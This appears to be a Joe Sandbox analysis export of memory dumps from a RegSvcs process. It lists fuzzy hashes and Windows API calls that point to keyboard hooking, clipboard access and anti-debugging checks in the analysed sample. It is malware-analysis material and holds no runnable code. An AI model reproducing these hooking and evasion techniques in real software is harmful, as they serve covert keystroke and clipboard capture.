                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A42AEA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 3bd867d05ebc8ce2a259a433d827396b856ab0795d9e6b33014756b0eeea773c
                                            • Instruction ID: 611bdb3a73588318b0e876e62f1c9cf8e5cffba5f4276e1d73e8726fa025bd21
                                            • Opcode Fuzzy Hash: 3bd867d05ebc8ce2a259a433d827396b856ab0795d9e6b33014756b0eeea773c
                                            • Instruction Fuzzy Hash: 7551D3B1C00309EFDB15DF99D984ADEBBB5FF88350F24812AE818AB210D771A945CF51

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a244d5f4319875e2674d41e0e20cc40116ec04b29294994c9dff14191729581
                                            • Instruction ID: 5446a2a12feeddaa5e9fc6fd9ce04f93044244fdae2c0373a07037dd66c0c321
                                            • Opcode Fuzzy Hash: 4a244d5f4319875e2674d41e0e20cc40116ec04b29294994c9dff14191729581
                                            • Instruction Fuzzy Hash: 5A416872D043959FCB04DFB9D8046EEBFF5AF89310F14866AD409A7641EB389840CBE1

                                            Control-flow Graph (rendered graph and executed/not-executed legend not reproduced)
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A42AEA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: bd71b1e0087c1b3407d69fbe945d056748b935851ef043b7d6bbd0cf161972ea
                                            • Instruction ID: 6a31d4ea55c8c2b1e8907c896e7242fc321d464ac2ddffd424668fd47c33b7dd
                                            • Opcode Fuzzy Hash: bd71b1e0087c1b3407d69fbe945d056748b935851ef043b7d6bbd0cf161972ea
                                            • Instruction Fuzzy Hash: 2F41A0B1D10349DFDB14DF9AC884ADEBBB5BF88310F24812AE819AB210D775A945CF90
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06A47689
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: ca7c19c6bebfcb162dd681b7d3156803e05dea87d836593e5707a6ac80c4a916
                                            • Instruction ID: dcbf9ac4a9cd8050f3903f9c7415809356798b5af9c6c63daa370a33e01e36bc
                                            • Opcode Fuzzy Hash: ca7c19c6bebfcb162dd681b7d3156803e05dea87d836593e5707a6ac80c4a916
                                            • Instruction Fuzzy Hash: 0D4126B4900349CFDB54EF99C888AAAFBF5FF88314F258459D519AB321C775A841CFA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: e79b7980228cfaaa953aab6b74e2c00f779e15ba4bd1a976b028455aa0433d9d
                                            • Instruction ID: 8d6c76d9d562064c97ba8a35943e7e25d6af673aa7978a0b85347c70fc0b3ced
                                            • Opcode Fuzzy Hash: e79b7980228cfaaa953aab6b74e2c00f779e15ba4bd1a976b028455aa0433d9d
                                            • Instruction Fuzzy Hash: 1731E2B0D01208DFDB54EF99D984BCEBBF5AB48304F248029E505BB290DB74A945CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 124afd0b5d152a980b95d6998eb353e0066434c97a890d41ea35bf548c325c46
                                            • Instruction ID: d6ade94e5d6969b789f1f87701a05714510c22c25d7c7c8d40553da5486cc3b1
                                            • Opcode Fuzzy Hash: 124afd0b5d152a980b95d6998eb353e0066434c97a890d41ea35bf548c325c46
                                            • Instruction Fuzzy Hash: F93102B0D01208DFDB50EF99D984BDEBBF5EB48304F208029E504BB290DB78A845CBA5
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F3712F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515309497.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2f30000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 0e8dca9416a488a02827ca26d28e4c19227f5675e57ebe3fd292c05321d313cd
                                            • Instruction ID: 316d23be02ec4b831bd72c0daccf68aa86d5dbe58b88ecb175c5fad67a2b52ee
                                            • Opcode Fuzzy Hash: 0e8dca9416a488a02827ca26d28e4c19227f5675e57ebe3fd292c05321d313cd
                                            • Instruction Fuzzy Hash: 822148B2C002598FDB10DFAAD484BEEFBF4AF49310F14845AE459B3251C738A945CF61
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A467B7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 70960ff6fe82fa2457236409b92ddda3723c9f5bcf931c8b0eead5ef8fb72e0b
                                            • Instruction ID: cba9462fda113d7f2f81de793c39a3043a12cdf453b15cf5054a52ec599f83dd
                                            • Opcode Fuzzy Hash: 70960ff6fe82fa2457236409b92ddda3723c9f5bcf931c8b0eead5ef8fb72e0b
                                            • Instruction Fuzzy Hash: 9621E3B5D10249AFDB10DFAAD984ADEBFF8EB49310F14801AE958A3311C374A954CFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A467B7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 6c367e1d771ec76263457bca0a3be00c55708f62dcccf9777e5097f879dc03f6
                                            • Instruction ID: 694c0761abe113348f442f89280347d3387a147207ff0ef504d80b3a56b9e776
                                            • Opcode Fuzzy Hash: 6c367e1d771ec76263457bca0a3be00c55708f62dcccf9777e5097f879dc03f6
                                            • Instruction Fuzzy Hash: 0C21E4B5D002499FDB10DFAAD884ADEBBF8FB48310F14801AE918A3310C374A944CFA1
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06A49E83
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520548854.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a40000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: c3717a621393c3d42370e860577e6b31ef11868511494716ae2aa9770901491b
                                            • Instruction ID: 6e912b84dd1583069efb691d39860a6831808ecdcce1b64ff72871ae833ab9ae
                                            • Opcode Fuzzy Hash: c3717a621393c3d42370e860577e6b31ef11868511494716ae2aa9770901491b
                                            • Instruction Fuzzy Hash: 1B2113B5D002099FCB54DF9AC844BEFFBF5BB89310F10842AE419A7250CB75A944CFA1
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06A49E83
                                            Memory Dump Source
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49b2601bb25412117a32262d9407bf13d6c163403f3d6ae3ea98091f059ac1e7
                                            • Instruction ID: 75468b26a1a205a27b94f6642f577989258e8026cb15793ac197194287eab9a1
                                            • Opcode Fuzzy Hash: 49b2601bb25412117a32262d9407bf13d6c163403f3d6ae3ea98091f059ac1e7
                                            • Instruction Fuzzy Hash: 8321E0B5C01259AFCB00DF9AD884ACEFFB8FB48350F10812AE918A7300C374A554CFA5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56020bda7e4d5a7467e6e08104c3d6e1a65c11667f352645a984636f48e32f1d
                                            • Instruction ID: d7a856d49cc9bf101c9208d6acec1eaf389e623d03da407a502d527c2bc72a0b
                                            • Opcode Fuzzy Hash: 56020bda7e4d5a7467e6e08104c3d6e1a65c11667f352645a984636f48e32f1d
                                            • Instruction Fuzzy Hash: 3501F131B040101BDF21E66EA45475FBBCBDBC6654F10883DE90ECB782E939CC424391
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43a1efc5b6163b340b91ebfaa85426888d2d086fb360345af9353a2c85ac9969
                                            • Instruction ID: 9dcfb8f58e2961ac0503fc3590b43c57604acd88823bbaa1f17d6e21b911db56
                                            • Opcode Fuzzy Hash: 43a1efc5b6163b340b91ebfaa85426888d2d086fb360345af9353a2c85ac9969
                                            • Instruction Fuzzy Hash: 7001F131B100102BCB21EA3C9490B2FB7D7EBCA624F118829E90ECB341DA29DC0743A1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bce8ecf321c706ad554ee2f72e28b5f4b470e6465bc9b6705eefb5610459f01
                                            • Instruction ID: bae22e2eea6577a438bd98cc5a8c041bca19dfaf526ecb2a622dc84978ec85a5
                                            • Opcode Fuzzy Hash: 7bce8ecf321c706ad554ee2f72e28b5f4b470e6465bc9b6705eefb5610459f01
                                            • Instruction Fuzzy Hash: E1018F32B141255BEF55EA69DC206EB72EBEBC8750F018439E90AD7380EF25DC0A47D2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d74de2804fc0904b790f730fca0e2b2ed7e7cebb82ee4854ae7f0bef7ee9c63
                                            • Instruction ID: b7793709cdacc2db49920d5de43461a9ee24f72d97cb0244e99b6a8b112390d2
                                            • Opcode Fuzzy Hash: 1d74de2804fc0904b790f730fca0e2b2ed7e7cebb82ee4854ae7f0bef7ee9c63
                                            • Instruction Fuzzy Hash: 8F116171E002149FCF68EB79D8405DEF7B2BBC9350F15856AD90AEB240EA308941CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81064a31ca5ad501ea61da3733bd8dda2728d4ad38b41da26dd81e92d4d72f5c
                                            • Instruction ID: 2220f0258007aa70474ceea34c8db43dda4b923fefae0f416431e1b2f4a5a5e8
                                            • Opcode Fuzzy Hash: 81064a31ca5ad501ea61da3733bd8dda2728d4ad38b41da26dd81e92d4d72f5c
                                            • Instruction Fuzzy Hash: FE11CFB5D01259AFCB00DF9AD884ADEFBB8FB48310F50812AE918A7200D374A954CFA5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 271d02c5435d776f50cc9bf56e7f94e4ae49b9f19b7596fdf77b113267b94182
                                            • Instruction ID: a78e3958c0cc7d4aae58939130771d703d8a77fb0ecb5e183c518e633d012b24
                                            • Opcode Fuzzy Hash: 271d02c5435d776f50cc9bf56e7f94e4ae49b9f19b7596fdf77b113267b94182
                                            • Instruction Fuzzy Hash: 1701AD31B000110BDF60E66EA45472FB3CBDBCA664F218839E90ECB781E979DC024395
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 362df6b380dd4cdeea66f2a49d0cfc78564292bf97732e2e53f1cad34c53d5cf
                                            • Instruction ID: fd9438eb31532f80f790c35f9907ded567e53cb8ed789dbc3110c66d88f555ad
                                            • Opcode Fuzzy Hash: 362df6b380dd4cdeea66f2a49d0cfc78564292bf97732e2e53f1cad34c53d5cf
                                            • Instruction Fuzzy Hash: 1D01D131B100111BCB65E62D945472EB2D7EBCA624F218839E90ECB340DE29DD434395
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dddbc765e7cb0a147b0d19969e3cd7ffe1591e061580e130267fb2fea54752c
                                            • Instruction ID: 0ab3275f0eddeec7b9dfd62dd126053fd72a6f4d6479e220e6b677b076af2006
                                            • Opcode Fuzzy Hash: 7dddbc765e7cb0a147b0d19969e3cd7ffe1591e061580e130267fb2fea54752c
                                            • Instruction Fuzzy Hash: 3E01F435B000151FDB60EB3DD44072EF3D7EB89668F118929EA0ECB340EA39DC428784
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40e9fa06f3cc0a1d21d66694296713f2a40d2172644caa5b32897ec2484259dd
                                            • Instruction ID: e12f3bc9e9440e635f9f79aa9056238da4ad86a4e2aaa1f746a807d089324307
                                            • Opcode Fuzzy Hash: 40e9fa06f3cc0a1d21d66694296713f2a40d2172644caa5b32897ec2484259dd
                                            • Instruction Fuzzy Hash: BFF0A736F20234A7DB24A666EC00A9AB73AF784760F014429ED02E7244DA32AC10C7C0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4044368050efacb89c3a62d2ed91baa2997545ef6e3606c88d8e41bb374f7ee9
                                            • Instruction ID: ed0bfcfeea1493977b19dedc1dfcdc4250f9c0174112b0bcf555b4d2b8cb3520
                                            • Opcode Fuzzy Hash: 4044368050efacb89c3a62d2ed91baa2997545ef6e3606c88d8e41bb374f7ee9
                                            • Instruction Fuzzy Hash: 68E0D871E102086BDB50EF74CE4575B76BDD701204F6248B5D809CF202E137CD028351
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-2843079600
                                            • Opcode ID: 562ec316256fa9cfb1306557ce88f2fe32177c832252e16371c9633387d19486
                                            • Instruction ID: 538de48c101478b2e37ba2c80b674832998a5a8bbda32c45e49315b711126473
                                            • Opcode Fuzzy Hash: 562ec316256fa9cfb1306557ce88f2fe32177c832252e16371c9633387d19486
                                            • Instruction Fuzzy Hash: 38121C70E002198FDB65EF69C854AADB7F2BF88304F218969D909AB355DB34DD81CF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1273862796
                                            • Opcode ID: 7e563128e8f7bbc65d2d103ae0129b75bd500f5d629865170bf9e48c9160ca74
                                            • Instruction ID: 7bb80e42498ab37362fc452c1c7e527a8c27f14851d6e81b74620f678a13bb58
                                            • Opcode Fuzzy Hash: 7e563128e8f7bbc65d2d103ae0129b75bd500f5d629865170bf9e48c9160ca74
                                            • Instruction Fuzzy Hash: 7A915070B10209DFDB64EFA5D994B6EB7F2FF44340F128629DA019B291DB759C81CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-981061697
                                            • Opcode ID: 7aebe7f203fd08995ada80d5ccac5ed81b47935eb73047ec8751ee9fbd7b4c1e
                                            • Instruction ID: 750d63bdac6b764b86a1b001215e0d0111571907d2c370bd735aa07a68202b88
                                            • Opcode Fuzzy Hash: 7aebe7f203fd08995ada80d5ccac5ed81b47935eb73047ec8751ee9fbd7b4c1e
                                            • Instruction Fuzzy Hash: F6F11C70A10205DFDB59EF69C994A6EB7B3FF88340F218569D805AB354DB35EC82CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 65ac50cb8e2321cabf03e2cbb8c4e338eff3d9f64dc5a399f29aebe25e78cd8a
                                            • Instruction ID: fea75a62704f30d4d7d29e9c4e74b6fc756032906d1f4dfe878acd445310e493
                                            • Opcode Fuzzy Hash: 65ac50cb8e2321cabf03e2cbb8c4e338eff3d9f64dc5a399f29aebe25e78cd8a
                                            • Instruction Fuzzy Hash: 93B11A70A11219CFDB54EF69C89466EB7B3FF88304F258829D8069B355DB79DC82CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-3527005858
                                            • Opcode ID: 3b32e031918c1339bed793ed962910b19615564ca77a05c8745c79bfbbf9e2ce
                                            • Instruction ID: ab5e31656976b54afa6dc3c47e6b83d6b471c266e8dcce71444c4c8456366043
                                            • Opcode Fuzzy Hash: 3b32e031918c1339bed793ed962910b19615564ca77a05c8745c79bfbbf9e2ce
                                            • Instruction Fuzzy Hash: 7451B430B002159FDB54EB29D980A6AB7F2FF88344B118569E8069F3A5DB39EC41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 7af0ba3b32fe729287bc27368b5fa0d1626c4712323d661582225e0efae3093d
                                            • Instruction ID: d91fde15560b39463c0ac614a4a86df9fa576a557b800381a592ee9856f04590
                                            • Opcode Fuzzy Hash: 7af0ba3b32fe729287bc27368b5fa0d1626c4712323d661582225e0efae3093d
                                            • Instruction Fuzzy Hash: 6E517270B102059BDF65EB64D9806AEB3B2FF85311F218A2AEE06DB340DB35DC41CB91